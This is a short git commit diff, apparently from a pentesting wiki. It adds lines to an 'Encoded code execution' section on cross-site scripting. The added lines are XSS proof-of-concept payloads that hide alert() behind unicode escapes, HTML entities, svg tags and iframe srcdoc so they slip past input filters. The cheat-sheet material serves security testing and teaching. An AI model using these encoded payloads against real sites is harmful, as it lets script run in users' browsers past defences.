GitBook: [master] one page modified

This commit is contained in:
CPol 2021-06-04 17:27:53 +00:00 committed by gitbook-bot
parent 4599752adc
commit c306c23a1d
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 4 additions and 1 deletions

View File

@ -418,9 +418,12 @@ This can be **abused** using: `${alert(1)}`
### Encoded code execution
```javascript
```markup
<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg> <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">
```
### JavaScript bypass blacklists techniques